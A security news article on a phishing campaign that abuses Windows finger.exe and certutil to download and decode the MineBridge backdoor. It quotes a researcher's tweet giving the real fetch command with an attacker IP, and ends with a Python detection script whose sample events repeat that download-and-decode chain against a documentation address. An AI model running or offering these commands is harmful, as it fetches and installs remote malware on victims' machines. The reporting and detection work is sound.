Windows Finger command abused by phishing to download malware

Attackers are using the normally harmless Windows Finger command to download and install a malicious backdoor on victims' devices.
The 'Finger' command is a utility that originated on Unix/Linux systems and lets a local user retrieve a list of users on a remote machine, or information about a particular remote user. Windows also ships a finger.exe command that provides the same functionality.
This week, security researcher Kirk Sayre found a phishing campaign utilizing the Finger command to download the MineBridge backdoor malware.
VirusTotal ITW maldoc using finger.exe to download 2nd stage. Runs 'finger nc20@184[.]164[.]146[.]102' to pull down b64 encoded cert, certutil to decode, runs payload. Payload is VirusTotal.
— Kirk Sayre (@bigmacjpg) January 14, 2021
Once executed, the downloader will download a TeamViewer executable and use DLL hijacking to sideload a malicious DLL, the MineBridge malware.
Interesting, downloads a teamviewer executable and a malicious dll, sideloaded by teamviewer, containing MINEBRIDGE malware - The behaviour is the same, apart from the finger.exe, even the TLD c2 *.top of fireeye report - STOMP 2 DIS: Brilliance in the (Visual) Basics
— Giuseppe `N3mes1s` (@gN3mes1s) January 15, 2021
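The chain described in the tweets (an Office document spawning finger.exe with a user@host target, then certutil decoding the fetched blob) can be spotted in process-creation telemetry. The following is an added detection example, not code from the article or the researchers; the Sysmon-style events, process IDs and the documentation IP 192.0.2.10 are constructed for illustration.

```python
import re

# Constructed, Sysmon-style process-creation records (not from the post).
# 192.0.2.10 is a documentation address standing in for the tweet's IP.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": '"WINWORD.EXE" /n invoice.docm'},
    {"pid": 4188, "image": r"C:\Windows\System32\finger.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "finger nc20@192.0.2.10"},
    {"pid": 4201, "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "certutil -decode out.txt payload.exe"},
    {"pid": 5010, "image": r"C:\Windows\System32\finger.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "finger"},  # local query only, no remote host: benign
    {"pid": 5022, "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Windows\System32\services.exe",
     "cmdline": "certutil -verify cert.cer"},  # legitimate certutil use
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# finger's remote form is user@host; such an argument means a network fetch.
FINGER_REMOTE = re.compile(r"\S+@\S+")
# certutil switches that turn a fetched text blob into a binary (or fetch one).
CERTUTIL_ABUSE = re.compile(r"-(decode|decodehex|urlcache|encode)\b", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the rule names an event triggers (empty list if none)."""
    hits = []
    image, parent = basename(event["image"]), basename(event["parent_image"])
    if image == "finger.exe" and FINGER_REMOTE.search(event["cmdline"]):
        hits.append("finger_remote_query")
    if image == "certutil.exe" and CERTUTIL_ABUSE.search(event["cmdline"]):
        hits.append("certutil_decode")
    if parent in OFFICE_APPS and image in {"finger.exe", "certutil.exe"}:
        hits.append("office_spawns_lolbin")
    return hits


def scan(events):
    """Map pid -> triggered rules for every event matching at least one rule."""
    return {e["pid"]: classify(e) for e in events if classify(e)}
```

Either finger.exe reaching out to a remote host or certutil decoding a file is worth a look on its own; both spawned by an Office process is the pattern in this campaign and should alert with high priority.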